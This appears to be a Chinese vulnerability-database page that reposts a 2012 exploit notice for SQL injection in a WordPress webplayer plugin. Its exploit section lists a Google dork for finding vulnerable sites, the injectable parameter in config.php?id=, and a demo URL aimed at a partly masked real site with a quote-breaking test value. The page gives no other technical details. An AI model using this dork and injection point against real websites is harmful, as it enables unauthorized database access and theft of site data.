Wordpress webplayer-plugin Theme SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046096 漏洞类型
发布时间 2012-11-22 更新时间 2012-11-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110159
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Wordpress webplayer-plugin Theme SQL Injection   ((|))
# Google Dork: inurl:wp-content/plugins/webplayer/config.php?id=         ((|))
# Exploit Author: Novin hack               #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #

#* Location:  http://site.com/wp-content/                       #
#* /plugins/webplayer/config.php?id=[SQLi]                      #

#* Demo: http://www.thedrXXXXometrue.com/wp-content/plugins/    #
#* webplayer/config.php?id=null'                                #


#* Greetz to:            * Arash.F       *                      #